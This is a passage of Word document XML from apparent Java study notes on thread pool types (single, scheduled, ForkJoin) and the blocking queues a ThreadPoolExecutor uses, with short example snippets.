          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Single Thread Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C256947" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:num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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creates a pool with only one thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124484D0" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:num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Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only one thread is used to execute the tasks sequentially, meaning tasks are executed one after another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7E5FE" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:num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Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful when you want to ensure tasks are executed in a specific order (i.e., one at a time), such as for logging or other sequential tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F3795"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53744810"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ExecutorService executor = Executors.newSingleThreadExecutor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD6E19"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B757838"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 xml:space="preserve">    // Task 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491CC97"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862AB4D"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5278EC"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 xml:space="preserve">    // Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5C84F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12389E" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Scheduled Thread Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812EEE6" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:num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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creates a thread pool that can schedule tasks to execute after a fixed delay or periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963BDCD" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:num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Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The tasks are executed at scheduled intervals or after a certain delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12754FEC" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:num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Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful for periodic tasks such as scheduled maintenance, monitoring, or any task that needs to be executed repeatedly at fixed intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3987BA2C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDEE9F"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ScheduledExecutorService scheduler = Executors.newScheduledThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B80BEC"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scheduler.scheduleAtFixedRate(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE457D"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 xml:space="preserve">    // Task to run periodically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC7D7C"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 0, 5, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156FD47" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. ForkJoinPool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F50C2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:num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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A special thread pool designed for parallelizing divide-and-conquer tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509CC49" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:num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Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The ForkJoinPool breaks tasks into smaller sub-tasks and processes them in parallel using multiple threads. It works well for tasks that can be recursively broken down into smaller tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EEFF7F" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:num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Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Best for parallel computing tasks that involve recursive processing (e.g., recursive algorithms, parallel algorithms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC76BD"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F41511"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ForkJoinPool pool = new ForkJoinPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8EFF1"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pool.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B799DF6"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 xml:space="preserve">    // Recursive task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD9CB1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5661003A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00000000" w:rsidP="006B098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73D4F84">
          <v:rect id="_x0000_i1845" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62528750" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choosing the Right Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131DE487" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:num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Fixed Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal for a fixed number of concurrent tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD4C80F" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:num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Cached Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is suitable for handling an unknown number of tasks with potentially high variation in task size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0BF06C" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:num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Single Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when tasks must execute in a sequential manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07131436" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:num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Scheduled Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is appropriate when tasks need to run periodically or after delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB1F35" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is best for parallelizing tasks that can be recursively broken down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8E197" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using the right thread pool can help manage resources more effectively, avoid thread over-provisioning, and optimize task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC3F73" w14:textId="5DC2BE92" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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F7B06DA">
          <v:rect id="_x0000_i1846" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9126B" w14:textId="44785B89" w:rsidR="00BB1B21" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB1B21" w:rsidP="00BB1B21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="_Toc196307758"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In Thread Pool Executor which data structure is used to store the request data?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w14:paraId="508AFE15" w14:textId="222A294C" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="008D0FE6">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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the data structure used to store the tasks (requests) that need to be executed is typically a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Specifically, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to hold the tasks before they are picked up by available threads for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439D6AB" w14:textId="77777777" w:rsidR="001E0230" w:rsidRPr="00CE4B95" w:rsidRDefault="001E0230" w:rsidP="001E0230">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F424C0F" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA708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mon Data Structures for BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6CD2E3" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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nkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3169F" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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is the most commonly used implementation of a BlockingQueue in ThreadPoolExecutor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7A888" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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has an optional capacity limit, meaning it can grow dynamically (if the capacity is not specified) or be bounded with a fixed capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3929EB" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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supports efficient thread-safe operations and allows multiple threads to enqueue and dequeue tasks safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720A0545" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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queue is full and threads are available, the tasks will be added to the queue, and threads will continue to execute the tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA24D28" w14:textId="25D31209" w:rsidR="00807203" w:rsidRPr="00CE4B95" w:rsidRDefault="008072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8731080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</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Runnable</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queu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nkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D58DD8" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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rrayBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF6565" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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is a bounded blocking queue where the capacity is fixed and set during initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1A9F0" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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is backed by an array, and it is useful when you want to limit the number of pending tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40711249" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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can block threads when the queue is full and will prevent new tasks from being added if the capacity is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0C85E" w14:textId="06830038" w:rsidR="00807203" w:rsidRPr="00CE4B95" w:rsidRDefault="008072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1756215"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue&lt;Runnable&gt; queue = new ArrayBlockingQueue&lt;&gt;(100</w:t>
      </w:r>
      <w:r w:rsidR="002675F2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>); /</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ Fixed capacity of 100 tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DECFD" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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ynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799611B" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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is a special kind of blocking queue that does not store any tasks. It directly hands over the task from the submitter to the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F0F52" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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is useful for high-throughput situations where you don’t need to store the tasks, and each task is handled by a thread immediately.</w:t>
      </w:r>
    </w:p>
